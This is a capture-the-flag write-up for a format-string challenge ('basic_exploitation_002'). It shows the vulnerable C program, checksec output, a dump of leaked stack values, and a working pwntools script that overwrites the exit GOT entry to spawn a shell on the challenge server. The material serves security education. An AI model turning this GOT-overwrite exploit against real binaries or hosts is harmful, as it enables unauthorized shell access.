Write-up of the challenge “basic_exploitation_002”#

This challenge is part of the “Binary exploitation” category and is in Level 2.

Goal of the challenge#

The objective of this challenge is to perform Format string attack

Program structure#

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <signal.h>
4
#include <unistd.h>
5

6

7
void alarm_handler() {
8
    puts("TIME OUT");
9
    exit(-1);
10
}
11

12

13
void initialize() {
14
    setvbuf(stdin, NULL, _IONBF, 0);
15
    setvbuf(stdout, NULL, _IONBF, 0);
16

17
    signal(SIGALRM, alarm_handler);
18
    alarm(30);
19
}
20

21
void get_shell() {
22
    system("/bin/sh");
23
}
24

25
int main(int argc, char *argv[]) {
26

27
    char buf[0x80];
28

29
    initialize();
30

31
    read(0, buf, 0x80);
32
    printf(buf);
33

34
    exit(0);
35
}

Security breach#

The vulnerability here is Format string attack:

1
    printf(buf);

It doesn’t specfiy any options like %p or %x e.t.c.

Solution#

First I checked the protection on the binary using checksec and I got this back:

1
Arch:     i386-32-little
2
RELRO:    Partial RELRO
3
Stack:    No canary found
4
NX:       NX enabled
5
PIE:      No PIE (0x8048000)

Great this means that the most addresses are fixed and that means we don’t have to leak any address during runtime!

So after that I decided to do some fuzz test of sending as much %p I can and I got this in return:

1
0x70257025
2
0x70257025
3
0x70257025
4
0x70257025
5
0x70257025
6
0x70257025
7
0x70257025
8
0x70257025
9
0x70257025
10
0x70257025
11
0x70257025
12
0x70257025
13
0x70257025
14
0x70257025
15
0x70257025
16
0x70257025
17
0x70257025
18
0x70257025
19
0x70257025
20
0x70257025
21
0x70257025
22
0x70257025
23
0x70257025
24
0x70257025
25
0x70257025
26
0x70257025
27
0x70257025
28
0x70257025
29
0x70257025
30
0x70257025
31
0x70257025
32
0x70257025
33
(nil)
34
0xf7c95ec3
35
0x1
36
0xffa4afa4
37
0xffa4afac
38
0xffa4af10
39
0xf7ea3e14
40
0x804861c
41
0x1
42
0xffa4afa4
43
0xf7ea3e14
44
0x8048650
45
0xf7f01c60
46
(nil)
47
0xf10191f4
48
0x2ae177e4
49
(nil)
50
(nil)
51
(nil)
52
0xf7f01c60
53
(nil)
54
0x597e8600
55
0xf7f02a70
56
0xf7c95e56
57
0xf7ea3e14
58
0xf7c95f88
59
0xf7ecbac4
60
0xf7f01fd4
61
0x10x80484b0
62
(nil)
63
0xf7eddbb0

As you can see the first element is already our input, and that means that the fmstr_payload should have an offset of one. My idea was to either use exit got and ovewrite it with the get_shell or use a stack address to ovewrite it with get_shell, in the end I decided to overwrite the exit got with get shell.

Note that the reason why the exit got worked in this exploit is because of this line in the binary and because there is no PIE:

1
    exit(0);

1
from pwn import *
2

3
# p = process('./basic_exploitation_002')
4
p = remote('host8.dreamhack.games', 21153)
5

6
elf = ELF('./basic_exploitation_002')
7

8
payload = fmtstr_payload(1, {elf.got['exit']: elf.sym['get_shell']}, write_size='short')
9

10
p.sendline(payload)
11

12
p.interactive()